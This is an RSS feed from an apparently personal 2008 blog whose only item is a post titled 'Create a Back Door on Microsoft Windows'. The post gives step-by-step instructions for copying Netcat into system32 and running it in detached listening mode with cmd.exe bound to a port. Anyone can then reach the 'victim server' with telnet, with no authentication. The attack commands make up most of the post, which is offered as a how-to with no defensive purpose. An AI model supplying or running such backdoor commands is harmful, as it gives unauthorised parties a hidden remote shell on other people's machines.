<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Fail2Care.COM v2.0 &#187; Hacking</title>
	<atom:link href="http://fail2care.com/category/hacking/feed" rel="self" type="application/rss+xml" />
	<link>http://fail2care.com</link>
	<description>The Blog of Randomness &#38; Failing 2 Care!!!</description>
	<lastBuildDate>Sun, 16 May 2010 01:49:37 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=abc</generator>
		<item>
		<title>Create a Back Door on Microsoft Windows</title>
		<link>http://fail2care.com/create-a-back-door-on-microsoft-windows</link>
		<comments>http://fail2care.com/create-a-back-door-on-microsoft-windows#comments</comments>
		<pubDate>Tue, 24 Jun 2008 15:27:45 +0000</pubDate>
		<dc:creator>PaulpBaker</dc:creator>
				<category><![CDATA[Hacking]]></category>

		<guid isPermaLink="false">http://fail2care.com/create-a-back-door-on-microsoft-windows</guid>
		<description><![CDATA[Netcat is referred to as the TCP/IP swiss army knife. Netcat can be used for good things, as well as bad. By using Netcat we can create a back door to any Windows machine with ease. Download the Windows version of Netcat. Unzip nc.exe to the %SYSTEMROOT%\system32 directory. Execute nc -d -L -e cmd.exe -p [...]


Related posts:<ol><li><a href='http://fail2care.com/door-shutting-for-windows-7-beta' rel='bookmark' title='Permanent Link: Door shutting for Windows 7 Beta'>Door shutting for Windows 7 Beta</a></li>
<li><a href='http://fail2care.com/microsoft-windows-7-first-screenshots' rel='bookmark' title='Permanent Link: Microsoft Windows 7: first screenshots'>Microsoft Windows 7: first screenshots</a></li>
<li><a href='http://fail2care.com/portable-ubuntu-ubuntu-system-running-as-a-windows-application' rel='bookmark' title='Permanent Link: Portable Ubuntu &#8211; Ubuntu system running as a Windows application!!!'>Portable Ubuntu &#8211; Ubuntu system running as a Windows application!!!</a></li>
</ol>]]></description>
			<content:encoded><![CDATA[<p><a href="http://netcat.sourceforge.net/" onclick="javascript:pageTracker._trackPageview('/outbound/article/http://netcat.sourceforge.net/');">Netcat</a> is referred to as the TCP/IP swiss army knife. Netcat can be used for good things, as well as bad. By using Netcat we can <strong>create a back door to any Windows machine with ease.</strong></p>
<ol>
<li>Download the Windows version of <a href="http://www.hackosis.com/wp-content/uploads/2008/01/nc.zip" onclick="javascript:pageTracker._trackPageview('/downloads/wp-content/uploads/2008/01/nc.zip');">Netcat</a>.</li>
<li dragover="true">Unzip nc.exe to the %SYSTEMROOT%\system32 directory.</li>
<li dragover="true">Execute <tt dragover="true">nc -d -L -e cmd.exe -p 10001</tt>. Change 10001 to which ever port you wish.</li>
<li>From any remote machine accessible to the victim server — you can now telnet to the server on port 10001 — <tt>telnet X.X.X.X 10001</tt> — <strong>without any authentication</strong>.</li>
</ol>


<p>Related posts:<ol><li><a href='http://fail2care.com/door-shutting-for-windows-7-beta' rel='bookmark' title='Permanent Link: Door shutting for Windows 7 Beta'>Door shutting for Windows 7 Beta</a></li>
<li><a href='http://fail2care.com/microsoft-windows-7-first-screenshots' rel='bookmark' title='Permanent Link: Microsoft Windows 7: first screenshots'>Microsoft Windows 7: first screenshots</a></li>
<li><a href='http://fail2care.com/portable-ubuntu-ubuntu-system-running-as-a-windows-application' rel='bookmark' title='Permanent Link: Portable Ubuntu &#8211; Ubuntu system running as a Windows application!!!'>Portable Ubuntu &#8211; Ubuntu system running as a Windows application!!!</a></li>
</ol></p>]]></content:encoded>
			<wfw:commentRss>http://fail2care.com/create-a-back-door-on-microsoft-windows/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
